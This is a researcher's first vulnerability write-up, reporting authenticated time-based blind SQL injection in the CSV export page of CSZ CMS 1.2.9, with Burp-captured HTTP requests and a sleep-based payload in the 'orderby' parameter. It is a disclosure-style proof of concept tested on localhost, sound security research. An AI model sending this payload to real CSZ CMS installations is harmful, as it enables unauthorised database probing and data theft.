Multiple Blind SQL Injection (Authenticated) in CSZ CMS Version 1.2.9
Hi Guys!!!
This is Rahad Chowdhury. I am a Cyber Security Researcher from Bangladesh.
This is My First Write-up.
Today’s topic is all about CSZ CMS Version 1.2.9 Multiple Parameter Blind SQL Injection (Authenticated).
CVE:
CMS Version:
1.2.9
Affected URL:
Description:
Time-based SQL Injection is presumptive SQL Injection technique their attacker sending an SQL query to the database which notifies the database to wait a certain period of time (in seconds) before responding. This attacks can be used to achieve very basic test like determining if a vulnerability is present. This is usually an excellent option when the attacker is facing a deep blind SQL injection. In this situation, only delay functions/procedures are necessary.
Now I explain how to get Time-based Blind SQL Injection vulnerability in CSZ CMS (Version 1.2.9).
At first I install CSZ CMS in my localhost. then I open admin panel and try to find vulnerability but not found any vulnerability. after then when i open “export” page, I guses that I got something.
Steps to Reproduce:
1. At first login your admin panel
2. then go to “General Menu > CSV Export / Import”
3. then select any Table Name and Select Fields.
4. Now open burp suite and configure with browser
5. then intercept with burp suite click by “Export to CSV”. your request data will be
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=article_db_id&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: x=x.x.x.x; _pk_id.x.x=x.x.x.x.x.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
6. “fieldS[]” or “orderby” parameter is vulnerable.
7. Let’s try to inject Blind SQL Injection use this query “(select(0)from(select(sleep(10)))a)” in “orderby” parameter. Your request data will be
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: x=x.x.x.x; _pk_id.x.x=x.x.x.x.x.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
8. check your response time you will see output:
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds